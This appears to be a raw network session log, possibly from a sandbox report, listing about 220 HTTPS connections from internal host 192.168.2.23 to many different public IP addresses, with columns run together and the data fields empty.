                                          14646192.168.2.2358196202.70.167.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14647192.168.2.234306276.96.80.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14648192.168.2.2359692157.74.12.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14649192.168.2.236060088.182.42.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14650192.168.2.234381682.217.131.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14651192.168.2.233727284.85.97.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14652192.168.2.2347904171.211.21.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14653192.168.2.235732299.180.70.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14654192.168.2.2349618177.70.48.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14655192.168.2.2352474129.191.19.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14656192.168.2.234317477.198.209.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14657192.168.2.234439872.219.9.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14658192.168.2.23444444.45.118.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14659192.168.2.2346722178.103.136.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14660192.168.2.234138642.232.174.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14661192.168.2.23526444.183.110.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14662192.168.2.234275270.177.216.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14663192.168.2.233620859.201.190.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14664192.168.2.234234632.178.6.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14665192.168.2.233320065.19.111.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14666192.168.2.2347570183.253.8.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14667192.168.2.2333258213.95.18.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14668192.168.2.235977889.6.102.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14669192.168.2.2335484152.226.176.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14670192.168.2.2337460131.234.245.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14671192.168.2.235573485.139.179.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14672192.168.2.2343192189.202.181.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14673192.168.2.2351634152.33.219.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14674192.168.2.2337944105.53.196.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14675192.168.2.2337498147.226.163.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14676192.168.2.2349442121.44.17.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14677192.168.2.2346242162.238.159.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14678192.168.2.234532868.29.88.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14679192.168.2.23464225.17.79.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14680192.168.2.2352664173.234.149.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14681192.168.2.233630819.123.125.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14682192.168.2.2334038195.169.82.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14683192.168.2.233999488.211.232.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14684192.168.2.2337862174.163.113.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14685192.168.2.235662036.104.214.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14686192.168.2.235270699.242.164.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14687192.168.2.2337278166.248.210.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14688192.168.2.2359004147.253.119.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14689192.168.2.2360026192.28.232.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14690192.168.2.2334042219.226.81.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14691192.168.2.2333052122.112.229.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14692192.168.2.2335830220.15.91.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14693192.168.2.2359518141.43.23.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14694192.168.2.2337656124.193.248.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14695192.168.2.235951294.164.33.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14696192.168.2.2354182103.97.34.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14697192.168.2.2357310156.90.126.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14698192.168.2.235968431.244.163.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14699192.168.2.2356322138.135.52.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14700192.168.2.2336130125.2.86.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14701192.168.2.2357260208.69.191.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14702192.168.2.235351413.118.214.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14703192.168.2.2338972129.224.254.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14704192.168.2.2355102128.237.91.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14705192.168.2.2360126107.215.40.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14706192.168.2.2345368152.235.152.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14707192.168.2.234900670.201.185.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14708192.168.2.234680647.180.123.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14709192.168.2.2350594187.142.147.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14710192.168.2.235768842.174.196.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14711192.168.2.235249696.179.227.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14712192.168.2.233701214.156.232.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14713192.168.2.234175888.113.140.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14714192.168.2.2350766170.53.244.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14715192.168.2.2343084174.205.167.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14716192.168.2.2352450110.243.86.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14717192.168.2.2345716146.130.212.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14718192.168.2.2355776137.182.98.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14719192.168.2.2342542175.29.90.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14720192.168.2.2352802167.150.21.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14721192.168.2.235385262.151.180.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14722192.168.2.2348624117.171.77.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14723192.168.2.2352638155.7.86.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14724192.168.2.23375161.209.235.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14725192.168.2.2340950128.222.62.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14726192.168.2.2348806130.74.150.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14727192.168.2.2358678161.245.32.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14728192.168.2.2349948219.104.81.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14729192.168.2.233466286.235.130.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14730192.168.2.2334736128.157.103.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14731192.168.2.234902846.217.145.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14732192.168.2.236025073.132.41.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14733192.168.2.2353612115.148.219.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14734192.168.2.233963083.126.156.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14735192.168.2.234727041.116.151.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14736192.168.2.2351696142.195.123.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14737192.168.2.2340946210.199.147.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14738192.168.2.234558836.224.119.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14739192.168.2.233523699.189.89.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14740192.168.2.2358734147.117.170.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14741192.168.2.2355164190.42.92.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14742192.168.2.2346126104.201.237.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14743192.168.2.235765698.127.163.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14744192.168.2.234269259.160.191.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14745192.168.2.234229469.91.149.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14746192.168.2.2337426196.233.216.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14747192.168.2.2346932131.198.107.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14748192.168.2.2346198107.218.244.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14749192.168.2.233307484.171.47.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14750192.168.2.234764894.54.57.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14751192.168.2.2345728140.229.142.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14752192.168.2.235012693.211.54.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14753192.168.2.2335560164.73.169.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14754192.168.2.2338554216.118.110.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14755192.168.2.235269244.242.240.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14756192.168.2.236095897.7.21.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14757192.168.2.2355906104.187.84.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14758192.168.2.234316624.127.132.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14759192.168.2.2339182176.90.240.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14760192.168.2.233981287.169.1.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14761192.168.2.234754864.59.155.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14762192.168.2.234688443.37.221.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14763192.168.2.234660489.172.44.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14764192.168.2.235706462.36.219.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14765192.168.2.2341710195.121.65.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14766192.168.2.2350596186.65.108.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14767192.168.2.233298454.204.60.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14768192.168.2.23499628.233.101.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14769192.168.2.233743666.102.3.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14770192.168.2.2353442195.229.19.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14771192.168.2.2341312116.198.134.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14772192.168.2.2360660189.10.250.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14773192.168.2.2343974130.223.247.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14774192.168.2.233392014.209.241.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14775192.168.2.235611274.197.214.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14776192.168.2.2338722181.64.100.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14777192.168.2.2356226128.196.110.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14778192.168.2.2350564202.50.219.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14779192.168.2.2334382166.192.225.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14780192.168.2.2344308140.95.249.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14781192.168.2.2358312184.227.12.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14782192.168.2.23327965.81.100.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14783192.168.2.2347542175.106.205.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14784192.168.2.233462264.127.6.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14785192.168.2.2359432117.203.165.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14786192.168.2.2347088125.119.204.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14787192.168.2.235618089.116.164.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14788192.168.2.2356080123.130.103.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14789192.168.2.235126484.29.8.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14790192.168.2.2360182171.182.129.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14791192.168.2.236017082.3.169.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14792192.168.2.234363013.159.123.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14793192.168.2.234997232.98.202.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14794192.168.2.234415853.49.255.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14795192.168.2.2343348203.200.96.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14796192.168.2.235847252.143.13.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14797192.168.2.234273223.105.19.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14798192.168.2.235575850.152.193.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14799192.168.2.2344842171.112.144.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14800192.168.2.23600144.20.74.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14801192.168.2.2333612131.42.48.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14802192.168.2.2350316147.219.250.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14803192.168.2.234585624.167.144.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14804192.168.2.235125086.88.39.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14805192.168.2.2358312110.11.89.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14806192.168.2.2358668130.108.1.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14807192.168.2.2356940189.54.204.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14808192.168.2.234365069.123.0.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14809192.168.2.2340238168.172.67.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14810192.168.2.2344530218.185.18.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14811192.168.2.2335058119.152.91.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14812192.168.2.2360520218.89.134.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14813192.168.2.233556483.239.75.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14814192.168.2.235513642.122.61.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14815192.168.2.233665027.88.89.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14816192.168.2.2350828160.186.241.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14817192.168.2.2344180185.135.161.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14818192.168.2.2335508147.77.43.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14819192.168.2.23591545.101.182.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14820192.168.2.2355508196.207.156.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14821192.168.2.2340092103.79.134.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14822192.168.2.234909673.211.253.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14823192.168.2.235970493.27.23.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14824192.168.2.2332866104.151.188.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14825192.168.2.233349093.140.221.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14826192.168.2.234850695.111.171.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14827192.168.2.23609861.111.156.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14828192.168.2.2358990131.100.136.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14829192.168.2.2347950115.74.46.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14830192.168.2.235378845.140.65.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14831192.168.2.2342932203.170.152.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14832192.168.2.235947424.33.97.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14833192.168.2.234296278.43.154.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14834192.168.2.2358350126.95.85.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14835192.168.2.235216223.201.166.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14836192.168.2.2336536140.78.86.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14837192.168.2.2337304102.165.212.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14838192.168.2.2341320164.189.181.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14839192.168.2.235046042.26.24.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14840192.168.2.235040859.98.55.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14841192.168.2.2351896220.141.98.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14842192.168.2.2332972205.134.220.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14843192.168.2.2357976146.30.61.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14844192.168.2.235938080.209.132.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14845192.168.2.233818843.215.137.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14846192.168.2.2353644139.206.170.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14847192.168.2.2336888182.80.97.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14848192.168.2.234344877.141.165.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14849192.168.2.234668295.179.208.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14850192.168.2.235559690.45.15.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14851192.168.2.2345504128.13.183.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14852192.168.2.2355108114.139.170.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14853192.168.2.2337066125.48.165.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14854192.168.2.2353968137.250.84.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14855192.168.2.235034898.146.34.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14856192.168.2.2342666105.182.102.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14857192.168.2.2359984205.112.253.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14858192.168.2.233754258.78.206.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14859192.168.2.2333234143.56.230.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14860192.168.2.2336850160.111.40.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14861192.168.2.2354692222.161.99.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14862192.168.2.2341316222.255.138.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14863192.168.2.234641046.224.1.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14864192.168.2.2333044119.32.225.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14865192.168.2.2345252126.150.254.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14866192.168.2.2342972170.198.24.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14867192.168.2.233392219.62.88.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
